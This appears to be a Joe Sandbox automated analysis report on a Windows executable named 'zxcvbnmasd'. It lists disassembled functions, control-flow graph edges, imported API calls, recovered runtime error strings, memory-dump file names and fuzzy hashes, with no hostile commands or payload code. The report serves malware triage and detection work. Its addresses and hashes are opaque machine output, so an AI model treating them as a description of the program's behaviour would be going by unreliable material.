                                                      Function 00007FF73FD26550 Relevance: 33.7, APIs: 17, Strings: 2, Instructions: 479COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 42 7ff73fd26550-7ff73fd26557 43 7ff73fd2655d-7ff73fd26609 42->43 44 7ff73fd26610-7ff73fd266ae wcslen call 7ff73fd2153f call 7ff73fd2145e 42->44 43->44 49 7ff73fd26738-7ff73fd2674c 44->49 50 7ff73fd266b4-7ff73fd266bb 44->50 54 7ff73fd2674e-7ff73fd2678e 49->54 55 7ff73fd26795-7ff73fd267ba wcslen 49->55 50->49 51 7ff73fd266bd-7ff73fd2672e call 7ff73fd22f70 call 7ff73fd239b0 call 7ff73fd214c7 50->51 51->49 70 7ff73fd26730-7ff73fd26733 call 7ff73fd2145e 51->70 54->55 59 7ff73fd267c0-7ff73fd267d0 _wcsnicmp 55->59 61 7ff73fd268dc 59->61 62 7ff73fd267d6-7ff73fd267ea wcslen 59->62 64 7ff73fd268e0-7ff73fd268f4 61->64 62->59 63 7ff73fd267ec 62->63 63->64 68 7ff73fd26959-7ff73fd26a11 memset wcscpy wcscat call 7ff73fd22f70 call 7ff73fd23350 call 7ff73fd214c7 memset 64->68 69 7ff73fd268f6-7ff73fd26952 64->69 78 7ff73fd26a17-7ff73fd26a1e 68->78 79 7ff73fd27df5-7ff73fd27e37 call 7ff73fd21370 68->79 69->68 70->49 81 7ff73fd26a67-7ff73fd26a77 wcslen 78->81 82 7ff73fd26a20-7ff73fd26a60 78->82 79->82 88 7ff73fd27e3d 79->88 84 7ff73fd26ab9-7ff73fd26abb 81->84 85 7ff73fd26a79-7ff73fd26a85 81->85 82->81 87 7ff73fd26ac1-7ff73fd26aeb wcscat memset 84->87 86 7ff73fd26a90-7ff73fd26aa0 _wcsnicmp 85->86 89 7ff73fd26abd 86->89 90 7ff73fd26aa2-7ff73fd26ab5 wcslen 86->90 91 7ff73fd27e42-7ff73fd27e8d call 7ff73fd21370 87->91 92 7ff73fd26af1-7ff73fd26af8 87->92 88->81 89->87 90->86 93 7ff73fd26ab7 90->93 94 7ff73fd26afa-7ff73fd26b4d 91->94 102 7ff73fd27e93 91->102 92->94 95 7ff73fd26b54-7ff73fd26b83 wcscpy wcscat 92->95 93->87 94->95 97 7ff73fd27e98-7ff73fd27ebe call 7ff73fd29750 call 7ff73fd21370 95->97 98 7ff73fd26b89-7ff73fd26b90 95->98 101 7ff73fd26b96-7ff73fd26c40 97->101 117 7ff73fd27ec4 97->117 100 7ff73fd26c47-7ff73fd26c4e 98->100 98->101 104 7ff73fd27ec9-7ff73fd27f0b call 7ff73fd21370 100->104 105 7ff73fd26c54-7ff73fd26c5b 100->105 101->100 102->95 109 7ff73fd26c5d-7ff73fd26c9d 104->109 118 7ff73fd27f11 104->118 105->109 110 7ff73fd26ca4-7ff73fd26cab 105->110 109->110 113 7ff73fd26cb1-7ff73fd26cb8 110->113 114 7ff73fd27f16-7ff73fd27f50 memcpy call 7ff73fd21370 110->114 115 7ff73fd26cbe-7ff73fd26cda 113->115 116 7ff73fd26e1d-7ff73fd26ebb wcslen call 7ff73fd2153f call 7ff73fd2145e 113->116 114->115 125 7ff73fd27f56 114->125 120 7ff73fd26ce0-7ff73fd26d38 115->120 128 7ff73fd26f51 116->128 129 7ff73fd26ec1-7ff73fd26ec8 116->129 117->100 118->110 120->120 123 7ff73fd26d3a-7ff73fd26e16 120->123 123->116 125->116 130 7ff73fd26f5d-7ff73fd26f79 128->130 131 7ff73fd26f58 call 7ff73fd2145e 128->131 129->128 132 7ff73fd26ece-7ff73fd26f47 call 7ff73fd22f70 call 7ff73fd239b0 call 7ff73fd214c7 129->132 131->130 132->128 139 7ff73fd26f49-7ff73fd26f4c call 7ff73fd2145e 132->139 139->128
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: wcslen$_wcsnicmp
                                                      • String ID: 0$X&
                                                      • API String ID: 4256727079-1646855245
                                                      • Opcode ID: 0edce3d47a61e15280e329d8b66cfce23b68d5c968ef05906b2626a2a5b586f2
                                                      • Instruction ID: 73975124326967e9f4a831f764ee83a2a7a7253a5ec4c3b677f06fead95aeb09
                                                      • Opcode Fuzzy Hash: 0edce3d47a61e15280e329d8b66cfce23b68d5c968ef05906b2626a2a5b586f2
                                                      • Instruction Fuzzy Hash: 91529F21C3D6C774FB1AAB28DC592F4A360AF553C4F846331DA6C127A1EF2C6245E7A0
                                                      Function 00007FF73FD211D8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                      • String ID: &
                                                      • API String ID: 3825114775-1499360005
                                                      • Opcode ID: 1374fe09d127b8ec737a1f36db43dc2c06298e6b629ae171b61fc4886b83ba6d
                                                      • Instruction ID: 6d5c4bb4aba54a1d33381c4c16d8dad95fbcd659ff235dbff5c4a63a122934a2
                                                      • Opcode Fuzzy Hash: 1374fe09d127b8ec737a1f36db43dc2c06298e6b629ae171b61fc4886b83ba6d
                                                      • Instruction Fuzzy Hash: 85412D319296CBB1EA09BB15EDA93F9A355AF447C0F809131DD0D432A5CE2CE445B7E0
                                                      Function 00007FF73FD23350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscatwcscpywcslen
                                                      • String ID: $0$0$@$@
                                                      • API String ID: 4263182637-1413854666
                                                      • Opcode ID: a275fb23657a88cb8887fae34cf2d4a1292e796e49282ae3ad477134c8cfb3f8
                                                      • Instruction ID: f5f93e1bfd12c91f29b6c30e7d52852eabc5b080279687bf1ac35041d69c0534
                                                      • Opcode Fuzzy Hash: a275fb23657a88cb8887fae34cf2d4a1292e796e49282ae3ad477134c8cfb3f8
                                                      • Instruction Fuzzy Hash: B5B1F72191C6C6A5F725EB14E8583FAF3A0FF81784F805235EA8C42A95DF3CD14ADB90
                                                      Function 00007FF73FD22690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                      • String ID: 0$X$`
                                                      • API String ID: 329590056-2527496196
                                                      • Opcode ID: 167915f824477ce25bf633221858cfc784a2430d342e6f666951a70b3a710d20
                                                      • Instruction ID: 8827225a97df67a747e3c9b51811ebfc2a2da060e28cf1cf39c90fa6f354228c
                                                      • Opcode Fuzzy Hash: 167915f824477ce25bf633221858cfc784a2430d342e6f666951a70b3a710d20
                                                      • Instruction Fuzzy Hash: 5002BE22918BC6A1F724AB14E8543EAB7A0FB85794F805335DAAC037E5DF3CD149DB90
                                                      Function 00007FF73FD21BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,?,?,00007FF73FD2B864,00007FF73FD2B864,?,?,00007FF73FD20000,?,00007FF73FD21991), ref: 00007FF73FD21C63
                                                      • VirtualProtect.KERNEL32(?,?,?,?,00007FF73FD2B864,00007FF73FD2B864,?,?,00007FF73FD20000,?,00007FF73FD21991), ref: 00007FF73FD21CC7
                                                      • memcpy.MSVCRT ref: 00007FF73FD21CE0
                                                      • GetLastError.KERNEL32(?,?,?,?,00007FF73FD2B864,00007FF73FD2B864,?,?,00007FF73FD20000,?,00007FF73FD21991), ref: 00007FF73FD21D23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                      • API String ID: 2595394609-2123141913
                                                      • Opcode ID: 6f36f86a525a45475d5f7f9479fc56c10debc891ecdaa8539843710fc4bdbf4e
                                                      • Instruction ID: a4cf34449b61a7bf13dd646a88ac7086b7c6fc576eebfc13c7717607d4d52302
                                                      • Opcode Fuzzy Hash: 6f36f86a525a45475d5f7f9479fc56c10debc891ecdaa8539843710fc4bdbf4e
                                                      • Instruction Fuzzy Hash: 76418175A2958BB5EA18AB05DCA86F8A760EB44BC4FE48131DD0D433A1DE3CE445E7E0
                                                      Function 00007FF73FD22104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                      • String ID:
                                                      • API String ID: 3326252324-0
                                                      • Opcode ID: fcfb865cc866e343a2c7847951ca254683af2e392602174b24cc102a20d99233
                                                      • Instruction ID: cb50efdd100364c7d34dbab1333f9eb8738bbabf2bbdd58a161a7f58130108d8
                                                      • Opcode Fuzzy Hash: fcfb865cc866e343a2c7847951ca254683af2e392602174b24cc102a20d99233
                                                      • Instruction Fuzzy Hash: 67211D21A195CBB1FA5DAB01DC683F8A260BF50BD1FC41130ED2E476A4DF2DA845A7E0
                                                      Function 00007FF73FD21E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 306 7ff73fd21e10-7ff73fd21e2d 307 7ff73fd21e3e-7ff73fd21e48 306->307 308 7ff73fd21e2f-7ff73fd21e38 306->308 310 7ff73fd21e4a-7ff73fd21e53 307->310 311 7ff73fd21ea3-7ff73fd21ea8 307->311 308->307 309 7ff73fd21f60-7ff73fd21f69 308->309 313 7ff73fd21ecc-7ff73fd21ed1 310->313 314 7ff73fd21e55-7ff73fd21e60 310->314 311->309 312 7ff73fd21eae-7ff73fd21eb3 311->312 315 7ff73fd21efb-7ff73fd21f0a call 7ff73fd29f00 312->315 316 7ff73fd21eb5-7ff73fd21eba 312->316 317 7ff73fd21f23-7ff73fd21f2d 313->317 318 7ff73fd21ed3-7ff73fd21ee2 signal 313->318 314->311 315->317 328 7ff73fd21f0c-7ff73fd21f10 315->328 316->309 319 7ff73fd21ec0 316->319 322 7ff73fd21f2f-7ff73fd21f3f 317->322 323 7ff73fd21f43-7ff73fd21f45 317->323 318->317 320 7ff73fd21ee4-7ff73fd21ee8 318->320 319->317 324 7ff73fd21eea-7ff73fd21ef9 signal 320->324 325 7ff73fd21f4e-7ff73fd21f53 320->325 322->323 323->309 324->309 327 7ff73fd21f5a 325->327 327->309 329 7ff73fd21f12-7ff73fd21f21 signal 328->329 330 7ff73fd21f55 328->330 329->309 330->327
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CCG
                                                      • API String ID: 0-1584390748
                                                      • Opcode ID: 5bf2a717babe67286cc28164b55208dcf2e1e4bf3b98298b469c0392ec4956c6
                                                      • Instruction ID: c189799759142c150116519afd5f795e3f7af8716b902329215deea81386aa86
                                                      • Opcode Fuzzy Hash: 5bf2a717babe67286cc28164b55208dcf2e1e4bf3b98298b469c0392ec4956c6
                                                      • Instruction Fuzzy Hash: 30219422E1D1CE71FA6C72149DA83F992419F847E4FA4C231DD2D437D8DE2CE981A2E1
                                                      Function 00007FF73FD238E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: wcslen
                                                      • String ID: 0$@
                                                      • API String ID: 4088430540-1545510068
                                                      • Opcode ID: 85d4a47882fd244ccb9d3f56351bc1e2e205bbf85242396c7daddac1748bd7a5
                                                      • Instruction ID: 2ea1c65086720a789bb07804ddb76ee70cbdb8d6e1151d5eedc7e084b5557f79
                                                      • Opcode Fuzzy Hash: 85d4a47882fd244ccb9d3f56351bc1e2e205bbf85242396c7daddac1748bd7a5
                                                      • Instruction Fuzzy Hash: F8119D2252C6C092E325DB24F45579AA374EFD4394F904134FA8D83B68EF3DC146CB80
                                                      Function 00007FF73FD21880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 339 7ff73fd21880-7ff73fd2189c 340 7ff73fd21a0f-7ff73fd21a1f 339->340 341 7ff73fd218a2-7ff73fd218f9 call 7ff73fd22420 call 7ff73fd22660 339->341 341->340 346 7ff73fd218ff-7ff73fd21910 341->346 347 7ff73fd2193e-7ff73fd21941 346->347 348 7ff73fd21912-7ff73fd2191c 346->348 350 7ff73fd2194d-7ff73fd21954 347->350 351 7ff73fd21943-7ff73fd21947 347->351 349 7ff73fd2191e-7ff73fd21929 348->349 348->350 349->350 352 7ff73fd2192b-7ff73fd2193a 349->352 354 7ff73fd2199e-7ff73fd219a6 350->354 355 7ff73fd21956-7ff73fd21961 350->355 351->350 353 7ff73fd21a20-7ff73fd21a26 351->353 352->347 356 7ff73fd21b87-7ff73fd21b98 call 7ff73fd21d40 353->356 357 7ff73fd21a2c-7ff73fd21a37 353->357 354->340 359 7ff73fd219a8-7ff73fd219c1 354->359 358 7ff73fd21970-7ff73fd2199c call 7ff73fd21ba0 355->358 357->354 361 7ff73fd21a3d-7ff73fd21a5f 357->361 358->354 363 7ff73fd219df-7ff73fd219e7 359->363 365 7ff73fd21a7d-7ff73fd21a97 361->365 367 7ff73fd219e9-7ff73fd21a0d VirtualProtect 363->367 368 7ff73fd219d0-7ff73fd219dd 363->368 369 7ff73fd21a9d-7ff73fd21afa 365->369 370 7ff73fd21b74-7ff73fd21b82 call 7ff73fd21d40 365->370 367->368 368->340 368->363 375 7ff73fd21afc-7ff73fd21b0e 369->375 376 7ff73fd21b22-7ff73fd21b26 369->376 370->356 377 7ff73fd21b5c-7ff73fd21b6f call 7ff73fd21d40 375->377 378 7ff73fd21b10-7ff73fd21b20 375->378 379 7ff73fd21b2c-7ff73fd21b30 376->379 380 7ff73fd21a70-7ff73fd21a77 376->380 377->370 378->376 378->377 379->380 381 7ff73fd21b36-7ff73fd21b53 call 7ff73fd21ba0 379->381 380->354 380->365 385 7ff73fd21b57 381->385 385->385
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73FD21247), ref: 00007FF73FD219F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                      • API String ID: 544645111-395989641
                                                      • Opcode ID: 624d886e0a2956385a3aa82a1c32ecec343fb83b6217246dc268823a2cc0203b
                                                      • Instruction ID: 0d30af612c10bf6560201dd84394807a669625e531e08bc0a52614c3fb2fba95
                                                      • Opcode Fuzzy Hash: 624d886e0a2956385a3aa82a1c32ecec343fb83b6217246dc268823a2cc0203b
                                                      • Instruction Fuzzy Hash: C8518131A245CAF5EB18AB15DC987F4A761EB047D8F948131D92C03794CE3CE486E7A0
                                                      Function 00007FF73FD21800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 386 7ff73fd21800-7ff73fd21810 387 7ff73fd21812-7ff73fd21822 386->387 388 7ff73fd21824 386->388 389 7ff73fd2182b-7ff73fd21867 call 7ff73fd22290 fprintf 387->389 388->389
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-3474627141
                                                      • Opcode ID: 7aa696c5338f06f51365a9fea6672589191880a4652d9327b4d132423833f54a
                                                      • Instruction ID: 8837f43d2c8a8bb6832799ff3c06e5acb4d203627d874ef572969072de9099cb
                                                      • Opcode Fuzzy Hash: 7aa696c5338f06f51365a9fea6672589191880a4652d9327b4d132423833f54a
                                                      • Instruction Fuzzy Hash: ACF0C812E289C9B2E215BB24AD550FDE360FB493D1F909231DE4D53251DF2CF141D390
                                                      Function 00007FF73FD2219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 682475483-0
                                                      • Opcode ID: d45a9a9716b8fea24e24f210a165b038e320887715f174ec21bcecc5c3d205a7
                                                      • Instruction ID: d482f756bd950899a8dde587ef49accba62a9e897154fcfd461ecd115da778eb
                                                      • Opcode Fuzzy Hash: d45a9a9716b8fea24e24f210a165b038e320887715f174ec21bcecc5c3d205a7
                                                      • Instruction Fuzzy Hash: E6011225A1D5CAB1FA5DAB01ED681F892607F04BD1FC40131DE2D43764DF2CA855A6A0

                                                      Execution Graph

                                                      Execution Coverage:5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:168
                                                      Total number of Limit Nodes:2
